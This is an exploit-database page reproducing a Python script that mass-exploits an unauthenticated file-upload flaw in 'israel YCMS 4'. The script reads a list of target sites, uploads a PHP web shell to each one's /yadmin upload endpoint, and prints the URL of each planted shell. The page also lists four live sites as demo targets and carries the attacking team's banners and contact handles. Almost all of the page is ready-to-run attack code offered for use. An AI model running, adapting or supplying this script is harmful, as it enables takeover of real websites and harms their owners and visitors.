Advertisement






israel YCMS 4 - Remote File Upload - CSRF / Shell Upload

CVE Category Price Severity
N/A CWE-434 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2023-11-29
CVSS
N/A - CVSS score not provided for this exploit

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023110032

Below is a copy:

israel YCMS 4 - Remote File Upload - CSRF / Shell Upload
[-] Title : israel YCMS  4 - Remote File Upload - CSRF / Shell Upload
[-] Author : 1933 (TURK TM - SS CYBER)
[-] Vendor : https://website.laki.co.il/
[-] Category : Webapps
[-] Dork : intext: " "  
[-] Date : 20/11/2023
[-] Demo Targets :
1-http://barak.ksite.co.il/
2-https://website.laki.co.il/
3-https://chanofan.com/
4-http://www.radio-lev.co.il/


Exploit:
import requests
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
  <title>1933-SS</title>
  <style>
    body {
      background-color: black;
      text-align: center;
    }
    h1 {
      color: red;
    }
    .uploaded {
      color: green;
    }
  </style>
</head>
<body>
  <h1>1933-ss cyber team</h1>
  <form enctype='multipart/form-data' action='' method='POST'>
    <input type='file' name='uploaded_file'></input>
    <input type='submit' value='Upload'></input>
  </form>
</body>
</html>

<?php
if (!empty($_FILES['uploaded_file'])) {
  $upload_dir = './';  // Define the directory where you want to save the uploaded files
  $file_name = basename($_FILES['uploaded_file']['name']);
  $file_path = $upload_dir . $file_name;

  if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
    echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
  } else {
    echo '<h1>There was an error uploading the file, please try again.</h1>';
  }
}
?>

"""
banner = Fore.CYAN +"""
   _____ _____    _______     ______  ______ _____    _______ ______          __  __ 
  / ____/ ____|  / ____\ \   / |  _ \|  ____|  __ \  |__   __|  ____|   /\   |  \/  |
 | (___| (___   | |     \ \_/ /| |_) | |__  | |__) |    | |  | |__     /  \  | \  / |
  \___ \\\___ \  | |      \   / |  _ <|  __| |  _  /     | |  |  __|   / /\ \ | |\/| |
  ____) ____) | | |____   | |  | |_) | |____| | \ \     | |  | |____ / ____ \| |  | |
 |_____|_____/   \_____|  |_|  |____/|______|_|  \_\    |_|  |______/_/    \_|_|  |_|
     """                                                                                
banner2 = "\nCoded by :" + Fore.RED +""" T.ME/D4LGH4CK_TM | T.ME/SS_CYBER_TEAM"""
print(banner+banner2+Fore.WHITE)
websites = input("\nwebsite list: ")
websites = open(websites,"r").read().split("\n")

for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
        else:
            print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue


**************************************************
- Telegram : @asad_turk0
- Tnx : RED KURD (@RED_AS_SOCITY)
- Thanks to my dear friend "RED KURD" for help to discover the bug.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.